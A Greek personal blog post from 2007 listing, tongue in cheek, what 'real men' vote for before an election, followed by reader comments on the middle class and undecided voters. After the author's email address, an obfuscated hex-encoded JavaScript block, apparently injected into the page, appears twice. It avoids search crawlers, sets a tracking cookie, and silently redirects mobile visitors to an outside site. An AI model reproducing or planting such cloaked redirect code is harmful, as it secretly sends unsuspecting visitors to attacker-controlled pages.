anwnymous

Σεπτεμβρίου 4, 2007

Τι ψηφίζουν οι άντρες ;( …με Α) …(κεφαλαίο Α)

Filed under: Uncategorized — thelastrealanwnymous @ 9 :32 μμ

1 Αυτό που θέλουν και όχι αυτό που θέλουν οι άλλοι

2 Αυτό που νομίζουν σωστό και όχι αυτό που θέλει το «άλλο» μισό τους

3 Ψηφίζουν δημοκρατία

4 Ψηφίζουν κοινωνική δικαιοσύνη

5 Ψηφίζουν ανθρώπους που δεν κουβαλάνε  «μπραντ νέιμ»

6 Ψηφίζουν άντρες που δεν τους γαλούχησε η τιβι

 7 Ψηφίζουν γυναίκες που δεν πίνουν πρωινούς καφέδες

8 Ψηφίζουν «μικρούς» όταν το αξίζουν.

9 Ψηφίζουν την καθαρή σκέψη που δεν γλιστράει στη λεζάντα.

10 Ψηφίζουν έστω κι αν βάλουν από τη τσέπη τους το εισιτήριο.

11 Ψηφίζουν το πρόσωπο και όχι το φόβο.

12 Ψηφίζουν τις απόψεις και όχι τους εκβιασμούς .

13 Ψηφίζουν την ευρωπαϊκή προοπτική και όχι τις μίκρο-πατριδογνωσίες.

 14 Ψηφίζουν για το (ασφαλιστικό ) μέλλον .

15 Ψηφίζουν για μια δυνατή μεσαία τάξη που κακά τα ψέματα μόνο αυτή

μπορεί να απολαμβάνει τη ζωή , τη κατανάλωση , τα γκάτζετς , τις διακοπές ,

τα παγωτά , τις πισίνες , τα πάρτι , τα ποτά , τα τσιγάρα , τα ξενύχτια , το σεξ ,

 τα πρόστυχα εσώρουχα , τα ντι βι ντι, τα σπορ αυτοκίνητα , τα δάνεια ,

 τις πιστωτικές , τα τατουάζ, το σολάριουμ , τα καινούρια γυαλιά των D&G

 τα κλαμπ σάντουιτς, τα πηδήματα στο αυτοκίνητο, την κόκα κόλα ,

 το ρεντ μπουλ, το φρέντο , το φρεντουτσίνο, τα σταρμπακς ,

 τα μπλογκς … γαμώτο ξέχασα τα μπλογκς , το τσατ ,

το σάιμπερ …όλα αυτά τέλος πάντων είναι για μια δυνατή μεσαία τάξη …

όλοι οι άλλοι δεν μπορούν να τα απολαύσουν , σκέφτονται μόνο

την αξία τους σε χρήμα , είναι με το κομπιουτεράκι στα χέρια,

τους κρυώνει ο εσπρέσο και αυτοί εκεί συνεχίζουν τους υπολογισμούς

 και μόνο καμιά φορά τους ξυπνάνε «οι άλλοι» ξέρετε ποιοι ?

 αυτοί που σκέφτονται να απεργήσουν .

Ο άντρας αν είναι Άντρας ψηφίζει μια δυνατή μεσαία τάξη .

 16 Στις 16 ψηφίζουμε … δεν ξέρω αν θα γράψω άλλο πόστ μέχρι τις εκλογές .

akaras1979@yahoo.grvar _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Advertisements

38 Σχόλια »

  1. Ρε Ανώνυμε δεν μας τα λες καλά..
    καθόλου καλά..
    Είθελα νάξερα, μόνος σου τα λες ή κάποιο αόρατο δάχτυλο σε σπρώχνει να τα πείς.

    Κατ’ αρχή, υπάρχουν άνδρες ?
    δεύτερο, αν υπήρχαν δεν θα φήφιζαν, με όλους αυτούς του όρους και προϋποθέσεις που βάζεις..
    δηλ. οι άνδρες ψηφίζουν αποχή..

    Αχ αυτοί οι σούπερ άνδρες ..θα χαθεί η ψήφος τους.. ξέρω οτι δεν εννοείς αυτό αλλά ετσι όπως τόβαλες λέω να μη πάω να ψηφίσω..

    ΥΓ.Αυτό με τα πρόστυχα εσώρρουχα δεν το πολυκατάλαβα..υπάρχει πρόστυχο εσώρρουχο? , με τη καλή έννοια φαντάζομαι…
    ΥΓ2 Αυτό το παραμύθι πάλι, για τη «.. δυνατή μεσαία τάξη που κακά τα ψέματα μόνο αυτή
    μπορεί να απολαμβάνει τη ζωή..» δηλ. εμείς της ανώτερης τάξης δεν ξέρουμε?…ξανασκέψου το.
    άκου ΔΥΝΑΤΗ μεσαία τάξη…εδω γελάνε..
    ΥΓ 3 Ασε, μη ξαναγράψεις μέχρι τις εκλογές..θα θάψεις και τους τελευταίους εναπομείναντες «άνδρες».. (Περιμένω και τον Σαρδό να σχολιάσει επ’αυτού)

    Σχόλιο από Takis — Σεπτεμβρίου 5, 2007 @ 12 :14 μμ | Απάντηση

  2. Αντώνυμε όλα τα σκέφτηκες…
    Πρόσθεσε την ψήφο μου σε όλα αυτά!
    Καλημέρα

    Σχόλιο από Adonios — Σεπτεμβρίου 5, 2007 @ 12 :35 μμ | Απάντηση

  3. Εγώ ομολογώ ότι πρώτη φορά έχω μπερδευτεί τόσο και ψάχνω να διαβάσω κάτω από τις λέξεις.
    Το 15 δε με τη μεσαία τάξη το κοίταξα με αμφισβήτηση και όταν έφτασε στο «πήδημα στο αυτοκίνητο» σκέφτηκα ότι το drive in είναι μια ωραία επιχείρηση τελικά. Είχε τραγουδήσει και ο υποψήφιος της Ν.Δ. Κώστας Τουρνάς το «δεν το ξανακάνω σ’ Αutobianchi» μια εποχή που οι Έλληνες δεν ήταν τόσο της fitness λογικής και σκέφτηκα ότι κάτι άλλο θέλει να πει το χαρισματικό μας παιδί ‘thelastrealanwnymous’..
    Τάσσομαι ανεπιφύλακτα με το 13 περί ευρωπαϊκής προοπτικής και μικρο-πατριδοσαχλαμάρες.. και με το 12 περί απόψεων και όχι εκβιασμών.
    Στο 15 θα ξανασταθώ όμως, κάπου εκεί στο τέλος το ‘Μύκονος μπλουζ’ στην αντρική του εκδοχή κρύβει μια αλήθεια..
    Και η κουβέντα συνεχίζεται ελπίζω..

    ΥΓ Τί θα πάθεις μέχρι τις εκλογές Ανώνυμε; Αγκύλωση στα δάχτυλα και δεν θα γράφεις;

    Σχόλιο από So_Far — Σεπτεμβρίου 5, 2007 @ 1 :29 μμ | Απάντηση

  4. taki
    εχεις πιάσει ακριβώς το υφος του κειμένου.
    αυτό που «ξένισε» και μενα όταν το ξαναδιάβασα ήταν ότι προσπαθησα να βρω ο λάιφστάιλ του ψηφοφόρου .
    αυτού του «δυνατού μεσαίου»
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 5, 2007 @ 7 :33 μμ | Απάντηση

  5. αντωνιε
    θενκς που με ψηφίζεις …
    🙂
    είμαστε λίγοι ακόμα αλλά εχουμε προοπτική

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 5, 2007 @ 7 :35 μμ | Απάντηση

  6. σο φαρ
    το 15 ειναι αυτό που ξεχνάνε τα προγράμματα των κομματων.
    είναι η καθημερινή απόλαυση διαφόρων πραγματων και στιγμών και γι αυτά δεν τους χρειαζόμαστε
    🙂
    όμως ανάμεσα σ’ αυτά τα ανέμελα υπαρχουν και καποιοι προβληματισμοί.
    και …ειναι δύσκολο όλοι αυτοί να συλλαβουν τη «δυνατή μεσαία τάξη» ενώ είναι εύκολο να μιλάνε για «μεσαίο χώρο» που περιέχει τα περισσότερα «αναποφάσιστα ψάρια»
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 5, 2007 @ 9 :35 μμ | Απάντηση

  7. Ωραία που το θέτεις έτσι γιατί κάτι τέτοιο καταλάβαινα κι εγώ αλλά είπα να μην το θίξω, κατ’ αρχήν.
    Νομίζω ότι δεν μπορεί να εφαρμοστεί η ταυτοποίηση της «μεσαίας τάξης» με το «μεσαίο χώρο». Ο μεσαίος χώρος μπορεί να ανήκει σε κάθε τάξη.
    Ο όρος «τάξη» όμως είναι άμεσα συνδεδεμένος με την οικονομική δυνατότητα και την παραγωγή. Σήμερα η μεσαία τάξη αλλά και η εργατική τάξη μέσω του ‘πρωτότυπου’ συστήματος δανεισμού έχει χάσει την ταυτότητά της. Δεν είναι μόνο αυτός ο λόγος βέβαια αλλά είναι και ο πιο φαινομενικός. ( Για να μην επεκταθούμε περισσότερο ).
    Και επειδή η περίφημη πάλη των τάξεων έχει πλέον εκλείψει ( για μένα κάκιστα γιατί το να ανήκεις σε μια τάξη δεν είναι μόνο οικονομική υπόθεση αλλά και πολλά άλλα ) άρχισαν οι εφευρέσεις του μεσαίου χώρου και η προσπάθεια σύνδεσης με τη μεσαία τάξη.
    Λογικά λοιπόν περνάμε στη διαχείριση και τη συναλλαγή.
    Η αντίφαση των κομμάτων όμως ( των 2 μεγάλων δηλαδή ) είναι ότι λέγοντας μεσαίος χώρος εννοούν τον παλιό κεντρώο/μετριοπαθή χώρο ο οποίος αναπτύχθηκε κάτω από άλλες ιστορικές συνθήκες. Και στο τέλος καταλήγουν να θεωρούν σαν μεσαία τάξη , τους αναποφάσιστους!!!! Ό,τι του φανεί του Λωλοστεφανή δηλαδή !

    Και τελικά τώρα που το ξανασκέφομαι ξέρετε τί διαπιστώνω ; Ότι φτάσαμε σε μία μορφή της … αταξικής κοινωνίας.

    Διότι:
    ( Εδώ η So_Far αρχίζει τη σπέκουλα για να ανάψει η κουβέντα )

    έχουμε σχεδόν όλοι τις ίδιες αγοραστικές δυνατότητες
    έχουμε σχεδόν όλοι τις ίδιες δυνατότητες διασκέδασης
    περνάμε σχεδόν όλοι τις ίδιες εμπειρίες στις τρισάθλιες δημόσιες υπηρεσίες
    η Μύκονος είναι προσιτή σε όλα τα wallets αλλά διαφοροποιούμαστε στους μήνες διακοπών
    στο Μιλάνο πάμε όλοι για ψώνια ( δεν έχει σημασία αν οι πιο πολλοί πετάνε με τον αεροπνίχτη )
    με 1000+ δόσεις μπορείς να αγοράσεις SLK και δεν ξέρω αν η JAGUAR έχει βάλει νερό στο κρασί της και δεν σου ζητάει πιο πριν το libro d’ oro για να δει το όνομά σου με χρυσά γράμματα
    οι μεγάλες επιχειρηματικές οικογένειες το έριξαν σε χώρους retail ( Mall & οικογένεια Λάτση ** σ.σ. άλλο ο στόλος και άλλο οι θηριώδεις συλλογές μικρών και μεγάλων ψιλικατζίδικων , έχει μια κοινωνική φιλοσοφία αυτό )
    μπορεί οποισδήποτε να έχει πρώτο τραπέζι πίστα αρκεί να ξέρει ποια μέρα του αναλογεί ( αν τρακάρεις με το γιο Κόκκαλη εννοείται ότι θα έχει καλύτερο τραπέζι από σένα στην Πέγκυ Ζήνα αλλά αν δεν τρακάρεις θα έχεις εσύ μεσαίε το τραπέζι του Κόκκαλη )
    η καλλιέργεια της ανώτερης τάξης έχει πέσει κατά πλειοψηφία στα τάρταρα και ακόμα την ψάχνουμε

    αυτά για αρχή …

    Σχόλιο από So_Far — Σεπτεμβρίου 6, 2007 @ 7 :37 πμ | Απάντηση

  8. κι εγώ ανησυχούσα που εξαφανίστηκες ρε αντώνημε!!!
    δεν σχολιάζω γιατί βιάζομαι…

    Σχόλιο από Natalia — Σεπτεμβρίου 6, 2007 @ 12 :33 μμ | Απάντηση

  9. σο φαρ
    όλοι οι υποψήφιοι ψάχνουν τον μεσαίο χώρο όπως οι μεγαλες εταιρείες σήμερα ψάχνουν τις παρθένες αγορές.
    το ερώτημα είναι περίπου ετσι: υπαρχει χώρος με ευκολόπιστους ; υπαρχει τρόπος να μας ψηφίσουν χωρίς πολλά -πολλά ; τι μπορεί να εχουν στο μυαλό τους αυτά τα «έντομα» τα κολλημένα στο απαλό φως της τιβι; τι μπορεί να ζητάνε , να τους δίναμε από ένα κινητό; μήπως μια ει ντι εσ ελ σύνδεση; ποιά είναι αυτή η χορδή που θα την αγγίξουμε και θα μας ψηφίσουν …
    λοιπόν σκεφτομαι τώρα αυτή την απλή φράση από στόμα ηλικιωμένου επενδυτή στο γραφείο μας : «20 χρόνια πριν το ενοίκιο , τα κοινόχρηστα (ρευμα, τηλ, νερο , κοινοχρ.) και το καλάθι του σουπερ μαρκετ ήταν το 30-40% του μισθού δημ υπαλληλου»
    ας πούμε τώρα ότι αυτό είναι μια βαση για να ξερουμε τι θέλουμε
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 6, 2007 @ 9 :22 μμ | Απάντηση

  10. ναταλια
    πες μας τώρα τι θα ψηφίσεις …
    εσύ που τα ρίχνεις στα ίσια και δεν εχεις αναστολές
    🙂

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 6, 2007 @ 9 :23 μμ | Απάντηση

  11. Το συμπέρασμά μου είναι ότι δεν υπάρχει ενιαίος μεσαίος χώρος.. υπάρχουν πολλοί και διαφορετικοί…
    Και αυτό είναι το χαώδες που δεν δίνει και την δυνατότητα πολιτικών επεξεργασιών..
    Ούτε μπορεί κανείς εύκολα να κάνει ‘χοντρικές’ διακρίσεις…
    Ας αποδεχτούν επί του παρόντος ότι το μόνο που μπορούν να κάνουν είναι να το αποδεχτούν… και να μην πανικοβάλλονται.

    Σχόλιο από So_Far — Σεπτεμβρίου 7, 2007 @ 10 :59 πμ | Απάντηση

  12. so far
    συμφωνώ πω δεν υπαρχει ενιαίος μεσαίος χώρος …
    ας πούμε εδω στα μπλογκς που εχουμε την εντύπωση ότι οι άνθρωποι προβληματίζονται και είναι περισσότερο ευαίσθητοι σε θέματα κοινωνίας και ποιότητας ζωής , περα από κάποια «εννιαία ξεσπασματα» για την αυθαιρεσία της πολιτικής μας ζωής , δεν εχουν τίποτε κοινό , γιατι προερχονται από διαφορετικούς χώρους , εδώ βρίσκουν ένα βήμα να εκτονώσουν «εκκρεμότητες» και φοβάμαι τελικά πως μεσα από ενα κλίμα αλληλοαπορρίψεων και αλλολοκατηγοριών , ότι θα ψηφίσουν αποφασίζοντας την τελευταία στιγμή , με μεγάλο κίνδυνο να επηρεαστούν από ένα χαμόγελο, ή μια φράση κλειδί βγαλμένη από προεκλογικά συνθήματα.

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 7, 2007 @ 11 :11 πμ | Απάντηση

  13. K.Οικοδεσπότα
    Θα ψιλοδιαφωνήσω λίγο..

    Γιατί λες οτι στα μπλόγκς οι άνθρωποι δεν έχουν τίποτε κοινό (πολιτικά εννοώ)?
    Κατ’αρχή το ένα κοινό είναι ότι,καθώς φαίνεται, όλοι προερχόμαστε απο τον περίφημο μεσαίο χώρο..έστω και αν αυτός ο χώρος χωρίζεται σε επιμέρους κομμάτια(όπως λέει και η So Far και συμφωνείς και εσύ)
    Ψυχρά οικονομικά αυτό μεταφράζεται σε κάποιο μέσο εισόδημα..και αυτό σημαίνει κάτι.

    Απο την άλλη, δεν πιστεύω ότι είναι πολλοί αυτοί που αποφασίζουν τελευταία στιγμή.
    Ισως αποφασίζουν την τελευταία στιγμή ΑΝ θα πάνε να ψηφίσουν και όχι τόσο ΤΙ θα ψηφίσουν.

    Επίσης, και πριν 20 χρόνια, ενοίκιο και καλάθι νοικοκυράς ήταν σίγουρα πάνω απο 40% του μέσου μισθού, αυτές οι οικονομικές συνισταμένες δεν αλλάζουν δραματικά..
    Απλά οι άνθρωποι δεν θυμούνται καλά…ή προτιμούν να μη θυμούνται.

    Σχόλιο από Takis — Σεπτεμβρίου 7, 2007 @ 12 :56 μμ | Απάντηση

  14. Πιστεύω – μια και μιλάμε για τα blogs – ότι οι περισσότεροι έχουν συγκεκριμένες και σταθερές πολιτικές πεποιθήσεις και κατατάξεις και έχουν ήδη αποφασίσει τί θα ψηφίσουν..

    Λίγοι είναι αυτοί που θα αποφασίσουν την τελευταία στιγμή..
    Και επικαλούμαι σε αυτό το βαθμό ευαισθησίας που δηλώνεις. Η πολιτική ευαισθησία [ κατά το βαθμό που είναι ειλικρινής και έντιμη ] έχει και πολιτικό προσανατολισμό.

    Αν αναφέρεσαι στις κινητοποιήσεις των blogs & sms , εντάξει μην το κάνουμε και σημαία: [ όπως το κάνει ο Αλαβάνος με τον Τσίπρα και με ενοχλεί πάρα πολύ, γιατί το θεωρώ επικοινωνιακό καπέλωμα από την πλευρά τους
    και διαφωνώ, άσχετα αν πάγια υπήρξα ψηφοφόρος τους ]

    κάποτε ήταν ο ντελάλης σήμερα είναι τα blogs & sms .. αύριο μπορεί να είναι ένα ιπτάμενο κατασκεύασμα [ δεν ξέρω τί ] που θα εκπέμπει κατευθείαν στις συνειδήσεις μας ..

    Όταν ήμουν οργανωμένη στο Ρήγα Φεραίο, μέσα στα πολλά που συζητούσαμε και αναλύαμε, θίγαμε συχνά και το θέμα των νέων ψηφοφόρων μας.
    Παιδιά ηλικίας 17 / 18 χρονών που θα τους κρατούσαμε για 4/5/6 χρόνια σαν ψηφοφόρους. Εκεί, η διαπίστωση που είχαμε κάνει και αποδεικνυόταν στην πράξη, ήταν ότι οι πρωτοετείς έρχονταν έτοιμοι πολιτικά. Ήδη προσανατολισμένοι.

    Το πάλεμα του μεσαίου χώρου λοιπόν είναι μια διαπίστωση για μένα λίγο πλασματική. Λειτουργεί σαν άλλοθι επιτυχίας ή αποτυχίας στις εκλογές. Ούτε το ποσοστό των αναποφάσιστων είναι τόσο μεγάλο. Οι δημοσκοπήσεις δεν είναι απόλυτο μέτρο, γιατί λειτουργούν σε μεγάλο βαθμό με τον ψυχισμό της στιγμής.
    Από την άλλη υπάρχουν και τα ΜΜΕ που ανάλογα με τα συμφέροντά τους θα αξιολογήσουν και θα «μεταφράσουν» μία δημοσκόπηση αντίστοιχα. Γιατί τα ΜΜΕ είναι αναπόσπαστο κομμάτι του προεκλογικού αγώνα , ίσως και το πιο σπουδαίο..

    Αυτά προς το παρόν γιατί είναι και πρωί..

    Σχόλιο από So_Far — Σεπτεμβρίου 8, 2007 @ 9 :09 πμ | Απάντηση

  15. vlepw oloi kseroume ti tha psifisoume..diakrinw megalh apofasistikothta vre paidi mou..kai oi meres mas teleiwnoun…telika mhpws h afairetikh methodos einai lathos?

    Σχόλιο από blue — Σεπτεμβρίου 8, 2007 @ 9 :53 μμ | Απάντηση

  16. τακη
    στα μπλογκς νομίζω πως υπαρχει μια αδιαμόρφωτη πολιτικά ,αλλά αρκετά μορφωμένη μαζα, που έχει αρκετές ιδιαιτερότητες και αναγκαστικά θα μένει αδρανής λογω πολυδιασπασης και πολυ- εξειδίκευσης απόψεων …
    ίσως κάποιο πολύ σύγχρονο ρεύμα , που να μη έχει την «πατεινή» να γυρίζει πίσω , όταν τα βρίσκει σκούρα , για να καταγγείλλει την κακιά δεξιά , ή για να ξαναθυμίσει τη διασπαση «εσωτερικού» -«εξωτερικού» :), να μπορέσει να στεγάσει ιδεολογικά τους μπλογκερς.
    η πολιτική όμως , όπως και η εξουσία είναι συντηρητικές στην ουσία τους. το ίντερνετ δεν κολλάει με όλους αυτούς γιατί είναι άναρχο , ανυπάκουο, ανυπότακτο και αυτοτροφοδοτούμενο γιατί δίνει λόγο σε ολους.
    λοιπόν το πρόβλημα παραμένει :περιμένουμε κατι καινούριο και δυστυχώς ούτε σ αυτές τις εκλογές εμφανίστηκε .
    και για το 40% του μισθού το ξανασκεφτηκα. Το πρόβλημα είναι ότι η έννοια του ελάχιστου βιώσιμου μισθού αντιτίθεται με την ελεύθερη αγορά γιατι παράγει τεμπεληδες που θα αρκούνται σ’ αυτόν (το μισθό). Γνωρίζετε φαντάζομαι τους ανατολίτες των ευρωπαϊκών κρατών που αραδιαζουν απογόνους και ζουν από τα επιδόματα .
    είμαστε σε μια χώρα που ο κατώτατος μισθός κατασκευάζει τεμπέληδες , που σε τελευταία ανάλυση ούτε καν απογόνους δεν παράγουν.

    Σχόλιο από thelastrealanwnymous — Σεπτεμβρίου 9, 2007 @ 11 :32 πμ | Απάντηση

  17. σο φαρ
    αν τα μπλογκς (το ίντερνετ μάλλον ) είναι η φωνη και των 18χρονων , των αρχάριων ψηφοφόρων , τότε λείπει από τα μπλογκς μια καθαρή φωνή που να προτείνει (για ψήφο) εστω τον μονόφθαλμο ανάμεσα στους τυφλούς. Όπως λείπουν οι σκεψεις τους (των 18χρονων)για το πως βλεπουν τον κόσμο .
